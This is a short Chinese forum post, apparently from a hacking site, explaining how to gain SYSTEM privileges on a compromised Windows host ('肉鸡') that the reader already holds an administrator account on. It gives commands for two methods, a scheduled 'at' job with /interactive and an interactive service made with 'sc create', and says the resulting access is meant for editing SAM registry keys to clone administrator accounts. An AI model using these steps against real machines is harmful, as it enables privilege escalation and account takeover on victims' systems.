有些朋友在得到肉鸡管理员账号时无法得到SYSTEM权限，导致无法克隆管理员账号。以前大家用的是第三方工具PSU，现在我介绍两种方法获得SYSTEM权限，让大家了解其中的一些细节。

   方法1：at time /interactive cmd.exe
           其中的参数TIME为具体时间，如果在远程主机主开启，只需要加上主机的IP就行了。比如：at 192.168.0.12 16:20 /interactive cmd.exe
参数：interactive 这个参数就是允许作业在运行时，与当时登陆用户桌面进行交互。使用这种方法只要，先用NET TIME取得系统时间，再指定一个稍晚上的时间运行上面的命令就可以得到SYSTEM权限。

  方法2：sc create testsvc binpath= "cmd /K start" type= own type= interact
这种方法是使用开启服务，SC是系统自带的服务管理工具。参数解释：
  Create testsvc 生成服务，其中testsvc为想要的服务名，随便起一个；
  binpath= "cmd /K start" binpath可执行文件路径
  type = own 表示新开启一个进程，既不共用其他进程运行
  type= interact 服务可以与桌面交互作用，接收用户的输入。
然后再键入 sc start testsvc 就可以开启一个新的具有SYSTEM权限的SHELL。
这时在服务管理项中，可以看见有了testsvc这个项了。用完之后，sc delete testsvc删除服务。

得到SYSTEM权限之后，就可以操作SAM注册表键了，大家可以做个批处理或者小工具来操作，很简单。

[课程]Android-CTF解题方法汇总！